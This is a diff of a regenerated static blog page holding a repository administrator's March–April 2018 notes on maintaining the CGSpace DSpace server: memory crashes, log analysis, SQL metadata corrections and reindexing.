<pre><code>2018-03-11 11:38:15,592 WARN org.dspace.app.webui.servlet.InternalErrorServlet @ :session_id=91C2C0C59669B33A7683570F6010603A:internal_error:-- URL Was: https://cgspace.cgiar.or
<pre tabindex="0"><code>2018-03-11 11:38:15,592 WARN org.dspace.app.webui.servlet.InternalErrorServlet @ :session_id=91C2C0C59669B33A7683570F6010603A:internal_error:-- URL Was: https://cgspace.cgiar.or
g/jspui/listings-and-reports
-- Method: POST
-- Parameters were:
-- selected_admin_preset: &quot;ilri authors2&quot;
-- load: &quot;normal&quot;
-- next: &quot;NEXT STEP &gt;&gt;&quot;
-- step: &quot;1&quot;
-- selected_admin_preset: &#34;ilri authors2&#34;
-- load: &#34;normal&#34;
-- next: &#34;NEXT STEP &gt;&gt;&#34;
-- step: &#34;1&#34;
org.apache.jasper.JasperException: java.lang.NullPointerException
</code></pre><ul>
@ -282,7 +282,7 @@ org.apache.jasper.JasperException: java.lang.NullPointerException
<ul>
<li>The error in the DSpace log is:</li>
</ul>
<pre><code>org.apache.jasper.JasperException: java.lang.ArrayIndexOutOfBoundsException: -1
<pre tabindex="0"><code>org.apache.jasper.JasperException: java.lang.ArrayIndexOutOfBoundsException: -1
</code></pre><ul>
<li>The full error is here: <a href="https://gist.github.com/alanorth/ea47c092725960e39610db9b0c13f6ca">https://gist.github.com/alanorth/ea47c092725960e39610db9b0c13f6ca</a></li>
<li>If I do a report for &ldquo;Orth, Alan&rdquo; with the same custom layout it works!</li>
@ -295,16 +295,16 @@ org.apache.jasper.JasperException: java.lang.NullPointerException
<li>I have removed the old server (linode02 aka linode578611) in favor of linode19 aka linode6624164</li>
<li>Looking at the CRP subjects on CGSpace I see there is one blank one so I&rsquo;ll just fix it:</li>
</ul>
<pre><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=230 and text_value='';
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=230 and text_value=&#39;&#39;;
</code></pre><ul>
<li>Copy all CRP subjects to a CSV to do the mass updates:</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=230 group by text_value order by count desc) to /tmp/crps.csv with csv header;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=230 group by text_value order by count desc) to /tmp/crps.csv with csv header;
COPY 21
</code></pre><ul>
<li>Once I prepare the new input forms (<a href="https://github.com/ilri/DSpace/issues/362">#362</a>) I will need to do the batch corrections:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i Correct-21-CRPs-2018-03-16.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.crp -t correct -m 230 -n -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Correct-21-CRPs-2018-03-16.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.crp -t correct -m 230 -n -d
</code></pre><ul>
<li>Create a pull request to update the input forms for the new CRP subject style (<a href="https://github.com/ilri/DSpace/pull/366">#366</a>)</li>
</ul>
@ -316,13 +316,13 @@ COPY 21
<li>CGSpace crashed this morning for about seven minutes and Dani restarted Tomcat</li>
<li>Around that time there were an increase of SQL errors:</li>
</ul>
<pre><code>2018-03-19 09:10:54,856 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
<pre tabindex="0"><code>2018-03-19 09:10:54,856 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
...
2018-03-19 09:10:54,862 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL query singleTable Error -
</code></pre><ul>
<li>But these errors, I don&rsquo;t even know what they mean, because a handful of them happen every day:</li>
</ul>
<pre><code>$ grep -c 'ERROR org.dspace.storage.rdbms.DatabaseManager' dspace.log.2018-03-1*
<pre tabindex="0"><code>$ grep -c &#39;ERROR org.dspace.storage.rdbms.DatabaseManager&#39; dspace.log.2018-03-1*
dspace.log.2018-03-10:13
dspace.log.2018-03-11:15
dspace.log.2018-03-12:13
@ -336,7 +336,7 @@ dspace.log.2018-03-19:90
</code></pre><ul>
<li>There wasn&rsquo;t even a lot of traffic at the time (8&ndash;9 AM):</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;19/Mar/2018:0[89]:&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;19/Mar/2018:0[89]:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
92 40.77.167.197
92 83.103.94.48
96 40.77.167.175
@ -350,8 +350,8 @@ dspace.log.2018-03-19:90
</code></pre><ul>
<li>Well there is a hint in Tomcat&rsquo;s <code>catalina.out</code>:</li>
</ul>
<pre><code>Mon Mar 19 09:05:28 UTC 2018 | Query:id: 92032 AND type:2
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-280&quot; java.lang.OutOfMemoryError: Java heap space
<pre tabindex="0"><code>Mon Mar 19 09:05:28 UTC 2018 | Query:id: 92032 AND type:2
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-280&#34; java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>So someone was doing something heavy somehow&hellip; my guess is content and usage stats!</li>
<li>ICT responded that they &ldquo;fixed&rdquo; the CGSpace connectivity issue in Nairobi without telling me the problem</li>
@ -367,7 +367,7 @@ Exception in thread &quot;http-bio-127.0.0.1-8081-exec-280&quot; java.lang.OutOf
<ul>
<li>DSpace Test has been down for a few hours with SQL and memory errors starting this morning:</li>
</ul>
<pre><code>2018-03-20 08:47:10,177 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
<pre tabindex="0"><code>2018-03-20 08:47:10,177 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
...
2018-03-20 08:53:11,624 ERROR org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter @ Serious Error Occurred Processing Request!
org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.lang.OutOfMemoryError: Java heap space
@ -377,21 +377,21 @@ org.springframework.web.util.NestedServletException: Handler processing failed;
<li>Abenet told me that one of Lance Robinson&rsquo;s ORCID iDs on CGSpace is incorrect</li>
<li>I will remove it from the controlled vocabulary (<a href="https://github.com/ilri/DSpace/pull/367">#367</a>) and update any items using the old one:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_value='Lance W. Robinson: 0000-0002-5224-8644' where resource_type_id=2 and metadata_field_id=240 and text_value like '%0000-0002-6344-195X%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value=&#39;Lance W. Robinson: 0000-0002-5224-8644&#39; where resource_type_id=2 and metadata_field_id=240 and text_value like &#39;%0000-0002-6344-195X%&#39;;
UPDATE 1
</code></pre><ul>
<li>Communicate with DSpace editors on Yammer about being more careful about spaces and character editing when doing manual metadata edits</li>
<li>Merge the changes to CRP names to the <code>5_x-prod</code> branch and deploy on CGSpace (<a href="https://github.com/ilri/DSpace/pull/363">#363</a>)</li>
<li>Run corrections for CRP names in the database:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Run all system updates on CGSpace (linode18) and reboot the server</li>
<li>I started a full Discovery re-index on CGSpace because of the updated CRPs</li>
<li>I see this error in the DSpace log:</li>
</ul>
<pre><code>2018-03-20 19:03:14,844 ERROR com.atmire.dspace.discovery.AtmireSolrService @ No choices plugin was configured for field &quot;dc_contributor_author&quot;.
java.lang.IllegalArgumentException: No choices plugin was configured for field &quot;dc_contributor_author&quot;.
<pre tabindex="0"><code>2018-03-20 19:03:14,844 ERROR com.atmire.dspace.discovery.AtmireSolrService @ No choices plugin was configured for field &#34;dc_contributor_author&#34;.
java.lang.IllegalArgumentException: No choices plugin was configured for field &#34;dc_contributor_author&#34;.
at org.dspace.content.authority.ChoiceAuthorityManager.getLabel(ChoiceAuthorityManager.java:261)
at org.dspace.content.authority.ChoiceAuthorityManager.getLabel(ChoiceAuthorityManager.java:249)
at org.dspace.browse.SolrBrowseCreateDAO.additionalIndex(SolrBrowseCreateDAO.java:215)
@ -415,40 +415,40 @@ java.lang.IllegalArgumentException: No choices plugin was configured for field
<li>Unfortunately this causes those items to simply not be indexed, which users noticed because item counts were cut in half and old items showed up in RSS!</li>
<li>Since we&rsquo;ve migrated the ORCID identifiers associated with the authority data to the <code>cg.creator.id</code> field we can nullify the authorities remaining in the database:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql">dspace<span style="color:#f92672">=#</span> <span style="color:#66d9ef">UPDATE</span> metadatavalue <span style="color:#66d9ef">SET</span> authority<span style="color:#f92672">=</span><span style="color:#66d9ef">NULL</span> <span style="color:#66d9ef">WHERE</span> resource_type_id<span style="color:#f92672">=</span><span style="color:#ae81ff">2</span> <span style="color:#66d9ef">AND</span> metadata_field_id<span style="color:#f92672">=</span><span style="color:#ae81ff">3</span> <span style="color:#66d9ef">AND</span> authority <span style="color:#66d9ef">IS</span> <span style="color:#66d9ef">NOT</span> <span style="color:#66d9ef">NULL</span>;
<span style="color:#66d9ef">UPDATE</span> <span style="color:#ae81ff">195463</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span>dspace<span style="color:#f92672">=#</span> <span style="color:#66d9ef">UPDATE</span> metadatavalue <span style="color:#66d9ef">SET</span> authority<span style="color:#f92672">=</span><span style="color:#66d9ef">NULL</span> <span style="color:#66d9ef">WHERE</span> resource_type_id<span style="color:#f92672">=</span><span style="color:#ae81ff">2</span> <span style="color:#66d9ef">AND</span> metadata_field_id<span style="color:#f92672">=</span><span style="color:#ae81ff">3</span> <span style="color:#66d9ef">AND</span> authority <span style="color:#66d9ef">IS</span> <span style="color:#66d9ef">NOT</span> <span style="color:#66d9ef">NULL</span>;
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">UPDATE</span> <span style="color:#ae81ff">195463</span>
</span></span></code></pre></div><ul>
<li>After this the indexing works as usual and item counts and facets are back to normal</li>
<li>Send Peter a list of all authors to correct:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql">dspace<span style="color:#f92672">=#</span> <span style="color:#960050;background-color:#1e0010">\</span><span style="color:#66d9ef">copy</span> (<span style="color:#66d9ef">select</span> <span style="color:#66d9ef">distinct</span> text_value, <span style="color:#66d9ef">count</span>(<span style="color:#f92672">*</span>) <span style="color:#66d9ef">as</span> <span style="color:#66d9ef">count</span> <span style="color:#66d9ef">from</span> metadatavalue <span style="color:#66d9ef">where</span> metadata_field_id <span style="color:#f92672">=</span> (<span style="color:#66d9ef">select</span> metadata_field_id <span style="color:#66d9ef">from</span> metadatafieldregistry <span style="color:#66d9ef">where</span> element <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;contributor&#39;</span> <span style="color:#66d9ef">and</span> qualifier <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;author&#39;</span>) <span style="color:#66d9ef">AND</span> resource_type_id <span style="color:#f92672">=</span> <span style="color:#ae81ff">2</span> <span style="color:#66d9ef">group</span> <span style="color:#66d9ef">by</span> text_value <span style="color:#66d9ef">order</span> <span style="color:#66d9ef">by</span> <span style="color:#66d9ef">count</span> <span style="color:#66d9ef">desc</span>) <span style="color:#66d9ef">to</span> <span style="color:#f92672">/</span>tmp<span style="color:#f92672">/</span>authors.csv <span style="color:#66d9ef">with</span> csv header;
<span style="color:#66d9ef">COPY</span> <span style="color:#ae81ff">56156</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span>dspace<span style="color:#f92672">=#</span> <span style="color:#960050;background-color:#1e0010">\</span><span style="color:#66d9ef">copy</span> (<span style="color:#66d9ef">select</span> <span style="color:#66d9ef">distinct</span> text_value, <span style="color:#66d9ef">count</span>(<span style="color:#f92672">*</span>) <span style="color:#66d9ef">as</span> <span style="color:#66d9ef">count</span> <span style="color:#66d9ef">from</span> metadatavalue <span style="color:#66d9ef">where</span> metadata_field_id <span style="color:#f92672">=</span> (<span style="color:#66d9ef">select</span> metadata_field_id <span style="color:#66d9ef">from</span> metadatafieldregistry <span style="color:#66d9ef">where</span> element <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;contributor&#39;</span> <span style="color:#66d9ef">and</span> qualifier <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;author&#39;</span>) <span style="color:#66d9ef">AND</span> resource_type_id <span style="color:#f92672">=</span> <span style="color:#ae81ff">2</span> <span style="color:#66d9ef">group</span> <span style="color:#66d9ef">by</span> text_value <span style="color:#66d9ef">order</span> <span style="color:#66d9ef">by</span> <span style="color:#66d9ef">count</span> <span style="color:#66d9ef">desc</span>) <span style="color:#66d9ef">to</span> <span style="color:#f92672">/</span>tmp<span style="color:#f92672">/</span>authors.csv <span style="color:#66d9ef">with</span> csv header;
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">COPY</span> <span style="color:#ae81ff">56156</span>
</span></span></code></pre></div><ul>
<li>Afterwards we&rsquo;ll want to do some batch tagging of ORCID identifiers to these names</li>
<li>CGSpace crashed again this afternoon, I&rsquo;m not sure of the cause but there are a lot of SQL errors in the DSpace log:</li>
</ul>
<pre><code>2018-03-21 15:11:08,166 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
<pre tabindex="0"><code>2018-03-21 15:11:08,166 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
java.sql.SQLException: Connection has already been closed.
</code></pre><ul>
<li>I have no idea why so many connections were abandoned this afternoon:</li>
</ul>
<pre><code># grep 'Mar 21, 2018' /var/log/tomcat7/catalina.out | grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon'
<pre tabindex="0"><code># grep &#39;Mar 21, 2018&#39; /var/log/tomcat7/catalina.out | grep -c &#39;org.apache.tomcat.jdbc.pool.ConnectionPool abandon&#39;
268
</code></pre><ul>
<li>DSpace Test crashed again due to Java heap space, this is from the DSpace log:</li>
</ul>
<pre><code>2018-03-21 15:18:48,149 ERROR org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter @ Serious Error Occurred Processing Request!
<pre tabindex="0"><code>2018-03-21 15:18:48,149 ERROR org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter @ Serious Error Occurred Processing Request!
org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>And this is from the Tomcat Catalina log:</li>
</ul>
<pre><code>Mar 21, 2018 11:20:00 AM org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor run
<pre tabindex="0"><code>Mar 21, 2018 11:20:00 AM org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor run
SEVERE: Unexpected death of background thread ContainerBackgroundProcessor[StandardEngine[Catalina]]
java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>But there are tons of heap space errors on DSpace Test actually:</li>
</ul>
<pre><code># grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
<pre tabindex="0"><code># grep -c &#39;java.lang.OutOfMemoryError: Java heap space&#39; /var/log/tomcat7/catalina.out
319
</code></pre><ul>
<li>I guess we need to give it more RAM because it now has CGSpace&rsquo;s large Solr core</li>
@ -457,7 +457,7 @@ java.lang.OutOfMemoryError: Java heap space
<li>Deploy the new JDBC driver on DSpace Test</li>
<li>I&rsquo;m also curious to see how long the <code>dspace index-discovery -b</code> takes on DSpace Test where the DSpace installation directory is on one of Linode&rsquo;s new block storage volumes</li>
</ul>
<pre><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 208m19.155s
user 8m39.138s
@ -470,7 +470,7 @@ sys 2m45.135s
<li>For example, Peter has inadvertently introduced Unicode character 0xfffd into several fields</li>
<li>I can search for Unicode values by their hex code in OpenRefine using the following GREL expression:</li>
</ul>
<pre><code>isNotNull(value.match(/.*\ufffd.*/))
<pre tabindex="0"><code>isNotNull(value.match(/.*\ufffd.*/))
</code></pre><ul>
<li>I need to be able to add many common characters though so that it is useful to copy and paste into a new project to find issues</li>
</ul>
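<ul>
<li>As a quick standalone check, a small Python sketch (hypothetical filename) can scan a metadata CSV export for the usual suspects like U+FFFD and U+00A0 and report the offending rows:</li>
</ul>
<pre tabindex="0"><code># Sketch: flag rows in a metadata CSV export whose fields contain characters
# that usually indicate encoding problems (the filename is hypothetical).
import csv

suspects = {
    '\ufffd': 'replacement character',
    '\u00a0': 'no-break space',
    '\u2019': 'right single quotation mark',
    '\u20ac': 'euro sign',
}

with open('metadata-export.csv', newline='', encoding='utf-8') as f:
    for lineno, row in enumerate(csv.reader(f), start=1):
        for field in row:
            found = [name for char, name in suspects.items() if char in field]
            if found:
                print('line {}: {} in {!r}'.format(lineno, ', '.join(found), field))
</code></pre>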
@ -489,11 +489,11 @@ sys 2m45.135s
<li>Looking at Peter&rsquo;s author corrections and trying to work out a way to find errors in OpenRefine easily</li>
<li>I can find all names that have acceptable characters using a GREL expression like:</li>
</ul>
<pre><code>isNotNull(value.match(/.*[a-zA-ZáÁéèïíñØøöóúü].*/))
<pre tabindex="0"><code>isNotNull(value.match(/.*[a-zA-ZáÁéèïíñØøöóúü].*/))
</code></pre><ul>
<li>But it&rsquo;s probably better to just say which characters I know for sure are not valid (like parentheses, pipe, or weird Unicode characters):</li>
</ul>
<pre><code>or(
<pre tabindex="0"><code>or(
isNotNull(value.match(/.*[(|)].*/)),
isNotNull(value.match(/.*\uFFFD.*/)),
isNotNull(value.match(/.*\u00A0.*/)),
@ -502,7 +502,7 @@ sys 2m45.135s
</code></pre><ul>
<li>And here&rsquo;s one combined GREL expression to check for items marked as to delete or check so I can flag them and export them to a separate CSV (though perhaps it&rsquo;s time to add delete support to my <code>fix-metadata-values.py</code> script):</li>
</ul>
<pre><code>or(
<pre tabindex="0"><code>or(
isNotNull(value.match(/.*delete.*/i)),
isNotNull(value.match(/.*remove.*/i)),
isNotNull(value.match(/.*check.*/i))
@ -521,8 +521,8 @@ sys 2m45.135s
<p>Test the corrections and deletions locally, then run them on CGSpace:</p>
</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/Correct-2928-Authors-2018-03-21.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3
$ ./delete-metadata-values.py -i /tmp/Delete-8-Authors-2018-03-21.csv -f dc.contributor.author -m 3 -db dspacetest -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Correct-2928-Authors-2018-03-21.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3
$ ./delete-metadata-values.py -i /tmp/Delete-8-Authors-2018-03-21.csv -f dc.contributor.author -m 3 -db dspacetest -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Afterwards I started a full Discovery reindexing on both CGSpace and DSpace Test</li>
<li>CGSpace took 76m28.292s</li>
@ -542,12 +542,12 @@ $ ./delete-metadata-values.py -i /tmp/Delete-8-Authors-2018-03-21.csv -f dc.cont
<li>DSpace Test crashed due to heap space so I&rsquo;ve increased it from 4096m to 5120m</li>
<li>The error in Tomcat&rsquo;s <code>catalina.out</code> was:</li>
</ul>
<pre><code>Exception in thread &quot;RMI TCP Connection(idle)&quot; java.lang.OutOfMemoryError: Java heap space
<pre tabindex="0"><code>Exception in thread &#34;RMI TCP Connection(idle)&#34; java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>Add ISI Journal (cg.isijournal) as an option in Atmire&rsquo;s Listing and Reports layout (<a href="https://github.com/ilri/DSpace/pull/370">#370</a>) for Abenet</li>
<li>I noticed a few hundred CRPs using the old capitalized formatting so I corrected them:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db cgspace -u cgspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db cgspace -u cgspace -p &#39;fuuu&#39;
Fixed 29 occurences of: CLIMATE CHANGE, AGRICULTURE AND FOOD SECURITY
Fixed 7 occurences of: WATER, LAND AND ECOSYSTEMS
Fixed 19 occurences of: AGRICULTURE FOR NUTRITION AND HEALTH
@ -585,15 +585,15 @@ Fixed 5 occurences of: GENEBANKS
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

@ -26,7 +26,7 @@ Catalina logs at least show some memory errors yesterday:
I tried to test something on DSpace Test but noticed that it&rsquo;s down since god knows when
Catalina logs at least show some memory errors yesterday:
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -56,12 +56,12 @@ Catalina logs at least show some memory errors yesterday:
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -107,7 +107,7 @@ Catalina logs at least show some memory errors yesterday:
<p class="blog-post-meta">
<time datetime="2018-04-01T16:13:54+02:00">Sun Apr 01, 2018</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -117,11 +117,11 @@ Catalina logs at least show some memory errors yesterday:
<li>I tried to test something on DSpace Test but noticed that it&rsquo;s down since god knows when</li>
<li>Catalina logs at least show some memory errors yesterday:</li>
</ul>
<pre><code>Mar 31, 2018 10:26:42 PM org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor run
<pre tabindex="0"><code>Mar 31, 2018 10:26:42 PM org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor run
SEVERE: Unexpected death of background thread ContainerBackgroundProcessor[StandardEngine[Catalina]]
java.lang.OutOfMemoryError: Java heap space
Exception in thread &quot;ContainerBackgroundProcessor[StandardEngine[Catalina]]&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;ContainerBackgroundProcessor[StandardEngine[Catalina]]&#34; java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>So this is getting super annoying</li>
<li>I ran all system updates on DSpace Test and rebooted it</li>
@ -134,12 +134,12 @@ Exception in thread &quot;ContainerBackgroundProcessor[StandardEngine[Catalina]]
<li>Peter noticed that there were still some old CRP names on CGSpace, because I hadn&rsquo;t forced the Discovery index to be updated after I fixed the others last week</li>
<li>For completeness I re-ran the CRP corrections on CGSpace:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db dspace -u dspace -p &#39;fuuu&#39;
Fixed 1 occurences of: AGRICULTURE FOR NUTRITION AND HEALTH
</code></pre><ul>
<li>Then started a full Discovery index:</li>
</ul>
<pre><code>$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx1024m'
<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx1024m&#39;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 76m13.841s
@ -149,18 +149,18 @@ sys 2m2.498s
<li>Elizabeth from CIAT emailed to ask if I could help her by adding ORCID identifiers to all of Joseph Tohme&rsquo;s items</li>
<li>I used my <a href="https://gist.githubusercontent.com/alanorth/a49d85cd9c5dea89cddbe809813a7050/raw/f67b6e45a9a940732882ae4bb26897a9b245ef31/add-orcid-identifiers-csv.py">add-orcid-identifiers-csv.py</a> script:</li>
</ul>
<pre><code>$ ./add-orcid-identifiers-csv.py -i /tmp/jtohme-2018-04-04.csv -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i /tmp/jtohme-2018-04-04.csv -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>The CSV format of <code>jtohme-2018-04-04.csv</code> was:</li>
</ul>
<pre><code class="language-csv" data-lang="csv">dc.contributor.author,cg.creator.id
&quot;Tohme, Joseph M.&quot;,Joe Tohme: 0000-0003-2765-7101
<pre tabindex="0"><code class="language-csv" data-lang="csv">dc.contributor.author,cg.creator.id
&#34;Tohme, Joseph M.&#34;,Joe Tohme: 0000-0003-2765-7101
</code></pre><ul>
<li>There was a quoting error in my CRP CSV and the replacements for <code>Forests, Trees and Agroforestry</code> got messed up</li>
<li>So I fixed them and had to re-index again!</li>
<li>I started preparing the git branch for the DSpace 5.5→5.8 upgrade:</li>
</ul>
<pre><code>$ git checkout -b 5_x-dspace-5.8 5_x-prod
<pre tabindex="0"><code>$ git checkout -b 5_x-dspace-5.8 5_x-prod
$ git reset --hard ilri/5_x-prod
$ git rebase -i dspace-5.8
</code></pre><ul>
@ -181,7 +181,7 @@ $ git rebase -i dspace-5.8
<li>Fix Sisay&rsquo;s sudo access on the new DSpace Test server (linode19)</li>
<li>The reindexing process on DSpace Test took <em>forever</em> yesterday:</li>
</ul>
<pre><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 599m32.961s
user 9m3.947s
@ -193,7 +193,7 @@ sys 2m52.585s
<li>Help Peter with the GDPR compliance / reporting form for CGSpace</li>
<li>DSpace Test crashed due to memory issues again:</li>
</ul>
<pre><code># grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
<pre tabindex="0"><code># grep -c &#39;java.lang.OutOfMemoryError: Java heap space&#39; /var/log/tomcat7/catalina.out
16
</code></pre><ul>
<li>I ran all system updates on DSpace Test and rebooted it</li>
@ -205,7 +205,7 @@ sys 2m52.585s
<li>I got a notice that CGSpace CPU usage was very high this morning</li>
<li>Looking at the nginx logs, here are the top users today so far:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;10/Apr/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;10/Apr/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
282 207.46.13.112
286 54.175.208.220
287 207.46.13.113
@ -220,24 +220,24 @@ sys 2m52.585s
<li>45.5.186.2 is of course CIAT</li>
<li>95.108.181.88 appears to be Yandex:</li>
</ul>
<pre><code>95.108.181.88 - - [09/Apr/2018:06:34:16 +0000] &quot;GET /bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg HTTP/1.1&quot; 200 2638 &quot;-&quot; &quot;Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)&quot;
